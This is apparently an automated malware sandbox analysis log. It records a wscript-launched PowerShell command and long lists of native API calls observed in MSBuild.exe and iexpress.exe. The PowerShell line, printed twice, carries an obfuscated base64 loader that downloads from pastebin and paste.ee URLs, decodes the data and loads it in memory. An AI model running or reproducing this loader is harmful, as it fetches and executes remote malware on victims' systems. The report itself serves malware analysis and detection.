                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?Ho?RgBL?GE?QQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?bgBh?EE?ZwBk?GM?V?BH?Cc?I??7?CQ?SQBl?H??RwBR?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?Ds?J?B3?GU?YgBD?Gw?aQBl?G4?d??g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?FI?VgBV?Fg?dg?g?D0?I??k?Hc?ZQBi?EM?b?Bp?GU?bgB0?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?Ho?RgBL?GE?QQ?g?Ck?I??7?CQ?UgBW?FU?W?B2?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BJ?GU?c?BH?FE?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?Cc?VQBU?EY?O??n?C??LQBm?G8?cgBj?GU?I??7?CQ?UwBU?GY?RwBs?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??y?C4?d?B4?HQ?Jw?p?C??Ow?k?F??a?By?Gw?Tg?g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?F??a?By?Gw?Tg?u?EU?bgBj?G8?Z?Bp?G4?Zw?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?V?Bl?Hg?d??u?EU?bgBj?G8?Z?Bp?G4?ZwBd?Do?OgBV?FQ?Rg?4?C??Ow?k?EQ?S?B6?FU?QQ?g?C??PQ?g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?Ek?ZQBw?Ec?UQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??PQ?g?CQ?U?Bo?HI?b?BO?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?EQ?S?B6?FU?QQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BT?FQ?ZgBH?Gw?I??t?GY?bwBy?GM?ZQ?g?Ds?J?BN?E8?R?BS?Gc?I??9?C??I??n?CQ?cgB5?GE?ZQBH?C??PQ?g?Cg?RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??Jw?n?Cc?I??r?C??J?BT?FQ?ZgBH?Gw?I??r?C??Jw?n?Cc?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?FU?V?BG?Dg?KQ?7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?EI?eQB0?GU?WwBd?F0?I??k?EY?eQBm?GQ?eg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?HI?eQBh?GU?Rw?u?HI?ZQBw?Gw?YQBj?GU?K??n?Cc?J??k?CQ?J??n?Cc?L??n?Cc?QQ?n?Cc?KQ?g?Ck?I??7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Cc?I??r?C??Jw?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?I??k?EY?eQBm?GQ?eg?g?Ck?Lg?n?C??Ow?k?E0?TwBE?FI?Zw?g?Cs?PQ?g?Cc?RwBl?HQ?V?B5?H??ZQ?o?C??Jw?n?E0?aQBz?GU?cgBp?GM?bwBy?GQ?aQBv?HM?bwBB?G0?ZQBu?C4?QwBs?GE?cwBz?DE?Jw?n?C??KQ?u?Ec?ZQB0?E0?Jw?g?Ds?J?BN?E8?R?BS?Gc?I??r?D0?I??n?GU?d?Bo?G8?Z??o?C??Jw?n?E0?cwBx?EI?SQBi?Fk?Jw?n?C??KQ?u?Ek?bgB2?G8?awBl?Cg?I??k?G4?dQBs?Gw?I??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?I??n?Cc?M??v?FQ?UgB4?E8?R?Ba?Dk?N??v?HI?LwBl?GU?LgBl?HQ?cwBh?H??Lw?v?Do?cwBw?HQ?d?Bo?Cc?Jw?g?Cw?I??n?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?Cc?I??s?C??Jw?n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?Ho?RgBL?GE?QQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?bgBh?EE?ZwBk?GM?V?BH?Cc?I??7?CQ?SQBl?H??RwBR?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?Ds?J?B3?GU?YgBD?Gw?aQBl?G4?d??g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?FI?VgBV?Fg?dg?g?D0?I??k?Hc?ZQBi?EM?b?Bp?GU?bgB0?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?Ho?RgBL?GE?QQ?g?Ck?I??7?CQ?UgBW?FU?W?B2?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BJ?GU?c?BH?FE?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?Cc?VQBU?EY?O??n?C??LQBm?G8?cgBj?GU?I??7?CQ?UwBU?GY?RwBs?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??y?C4?d?B4?HQ?Jw?p?C??Ow?k?F??a?By?Gw?Tg?g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?F??a?By?Gw?Tg?u?EU?bgBj?G8?Z?Bp?G4?Zw?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?V?Bl?Hg?d??u?EU?bgBj?G8?Z?Bp?G4?ZwBd?Do?OgBV?FQ?Rg?4?C??Ow?k?EQ?S?B6?FU?QQ?g?C??PQ?g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?Ek?ZQBw?Ec?UQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??PQ?g?CQ?U?Bo?HI?b?BO?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?EQ?S?B6?FU?QQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BT?FQ?ZgBH?Gw?I??t?GY?bwBy?GM?ZQ?g?Ds?J?BN?E8?R?BS?Gc?I??9?C??I??n?CQ?cgB5?GE?ZQBH?C??PQ?g?Cg?RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??Jw?n?Cc?I??r?C??J?BT?FQ?ZgBH?Gw?I??r?C??Jw?n?Cc?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?FU?V?BG?Dg?KQ?7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?EI?eQB0?GU?WwBd?F0?I??k?EY?eQBm?GQ?eg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?HI?eQBh?GU?Rw?u?HI?ZQBw?Gw?YQBj?GU?K??n?Cc?J??k?CQ?J??n?Cc?L??n?Cc?QQ?n?Cc?KQ?g?Ck?I??7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Cc?I??r?C??Jw?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?I??k?EY?eQBm?GQ?eg?g?Ck?Lg?n?C??Ow?k?E0?TwBE?FI?Zw?g?Cs?PQ?g?Cc?RwBl?HQ?V?B5?H??ZQ?o?C??Jw?n?E0?aQBz?GU?cgBp?GM?bwBy?GQ?aQBv?HM?bwBB?G0?ZQBu?C4?QwBs?GE?cwBz?DE?Jw?n?C??KQ?u?Ec?ZQB0?E0?Jw?g?Ds?J?BN?E8?R?BS?Gc?I??r?D0?I??n?GU?d?Bo?G8?Z??o?C??Jw?n?E0?cwBx?EI?SQBi?Fk?Jw?n?C??KQ?u?Ek?bgB2?G8?awBl?Cg?I??k?G4?dQBs?Gw?I??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?I??n?Cc?M??v?FQ?UgB4?E8?R?Ba?Dk?N??v?HI?LwBl?GU?LgBl?HQ?cwBh?H??Lw?v?Do?cwBw?HQ?d?Bo?Cc?Jw?g?Cw?I??n?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?Cc?I??s?C??Jw?n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0042CBB3 NtClose,10_2_0042CBB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A835C0 NtCreateMutant,LdrInitializeThunk,10_2_01A835C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82B60 NtClose,LdrInitializeThunk,10_2_01A82B60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_01A82DF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_01A82C70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A83090 NtSetValueKey,10_2_01A83090
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A83010 NtOpenDirectoryObject,10_2_01A83010
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A84340 NtSetContextThread,10_2_01A84340
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A84650 NtSuspendThread,10_2_01A84650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A839B0 NtGetContextThread,10_2_01A839B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82BA0 NtEnumerateValueKey,10_2_01A82BA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82B80 NtQueryInformationFile,10_2_01A82B80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82BE0 NtQueryValueKey,10_2_01A82BE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82BF0 NtAllocateVirtualMemory,10_2_01A82BF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82AB0 NtWaitForSingleObject,10_2_01A82AB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82AF0 NtWriteFile,10_2_01A82AF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82AD0 NtReadFile,10_2_01A82AD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82DB0 NtEnumerateKey,10_2_01A82DB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82DD0 NtDelayExecution,10_2_01A82DD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82D30 NtUnmapViewOfSection,10_2_01A82D30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82D00 NtSetInformationFile,10_2_01A82D00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A83D10 NtOpenProcessToken,10_2_01A83D10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82D10 NtMapViewOfSection,10_2_01A82D10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A83D70 NtOpenThread,10_2_01A83D70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82CA0 NtQueryInformationToken,10_2_01A82CA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82CF0 NtOpenProcess,10_2_01A82CF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82CC0 NtQueryVirtualMemory,10_2_01A82CC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82C00 NtQueryInformationProcess,10_2_01A82C00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82C60 NtCreateKey,10_2_01A82C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82FA0 NtQuerySection,10_2_01A82FA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82FB0 NtResumeThread,10_2_01A82FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82F90 NtProtectVirtualMemory,10_2_01A82F90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82FE0 NtCreateFile,10_2_01A82FE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82F30 NtCreateSection,10_2_01A82F30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82F60 NtCreateProcessEx,10_2_01A82F60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82EA0 NtAdjustPrivilegesToken,10_2_01A82EA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82E80 NtReadVirtualMemory,10_2_01A82E80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82EE0 NtQueueApcThread,10_2_01A82EE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A82E30 NtWriteVirtualMemory,10_2_01A82E30
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E035C0 NtCreateMutant,LdrInitializeThunk,12_2_04E035C0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E04650 NtSuspendThread,LdrInitializeThunk,12_2_04E04650
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E04340 NtSetContextThread,LdrInitializeThunk,12_2_04E04340
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_04E02CA0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02C60 NtCreateKey,LdrInitializeThunk,12_2_04E02C60
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_04E02C70
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_04E02DF0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02DD0 NtDelayExecution,LdrInitializeThunk,12_2_04E02DD0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_04E02D30
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02D10 NtMapViewOfSection,LdrInitializeThunk,12_2_04E02D10
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02EE0 NtQueueApcThread,LdrInitializeThunk,12_2_04E02EE0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_04E02E80
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02FE0 NtCreateFile,LdrInitializeThunk,12_2_04E02FE0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02FB0 NtResumeThread,LdrInitializeThunk,12_2_04E02FB0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02F30 NtCreateSection,LdrInitializeThunk,12_2_04E02F30
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E039B0 NtGetContextThread,LdrInitializeThunk,12_2_04E039B0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02AF0 NtWriteFile,LdrInitializeThunk,12_2_04E02AF0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02AD0 NtReadFile,LdrInitializeThunk,12_2_04E02AD0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02BE0 NtQueryValueKey,LdrInitializeThunk,12_2_04E02BE0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_04E02BF0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02BA0 NtEnumerateValueKey,LdrInitializeThunk,12_2_04E02BA0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02B60 NtClose,LdrInitializeThunk,12_2_04E02B60
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E03090 NtSetValueKey,12_2_04E03090
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E03010 NtOpenDirectoryObject,12_2_04E03010
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02CF0 NtOpenProcess,12_2_04E02CF0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02CC0 NtQueryVirtualMemory,12_2_04E02CC0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02C00 NtQueryInformationProcess,12_2_04E02C00
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02DB0 NtEnumerateKey,12_2_04E02DB0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E03D70 NtOpenThread,12_2_04E03D70
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02D00 NtSetInformationFile,12_2_04E02D00
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E03D10 NtOpenProcessToken,12_2_04E03D10
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02EA0 NtAdjustPrivilegesToken,12_2_04E02EA0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02E30 NtWriteVirtualMemory,12_2_04E02E30
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02FA0 NtQuerySection,12_2_04E02FA0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02F90 NtProtectVirtualMemory,12_2_04E02F90
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02F60 NtCreateProcessEx,12_2_04E02F60
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02AB0 NtWaitForSingleObject,12_2_04E02AB0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04E02B80 NtQueryInformationFile,12_2_04E02B80
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02EE96D0 NtReadFile,12_2_02EE96D0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02EE97C0 NtDeleteFile,12_2_02EE97C0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02EE9560 NtCreateFile,12_2_02EE9560
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02EE9860 NtClose,12_2_02EE9860
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02EE99D0 NtAllocateVirtualMemory,12_2_02EE99D0
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04CEF8C9 NtClose,12_2_04CEF8C9
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF93685E86D8_2_00007FF93685E86D
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF93685E1E58_2_00007FF93685E1E5
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF9369208D18_2_00007FF9369208D1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00418A7310_2_00418A73
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004010D010_2_004010D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004030D010_2_004030D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0042F1E310_2_0042F1E3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0041020310_2_00410203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00402BF410_2_00402BF4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00402BFD10_2_00402BFD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00401B9610_2_00401B96
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00401BA010_2_00401BA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040145010_2_00401450
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00416C6110_2_00416C61
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00416C6310_2_00416C63
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00402C0010_2_00402C00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040E40310_2_0040E403
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0041042310_2_00410423
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004024AA10_2_004024AA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004024B010_2_004024B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040E54810_2_0040E548
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040E55310_2_0040E553
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040E59C10_2_0040E59C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040275010_2_00402750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A5B1B010_2_01A5B1B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B101AA10_2_01B101AA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B081CC10_2_01B081CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A4010010_2_01A40100
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AEA11810_2_01AEA118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A8516C10_2_01A8516C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A3F17210_2_01A3F172
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B1B16B10_2_01B1B16B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B0F0E010_2_01B0F0E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B070E910_2_01B070E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01AFF0CC10_2_01AFF0CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A570C010_2_01A570C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A9739A10_2_01A9739A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A5E3F010_2_01A5E3F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B103E610_2_01B103E6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B0132D10_2_01B0132D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01B0A35210_2_01B0A352
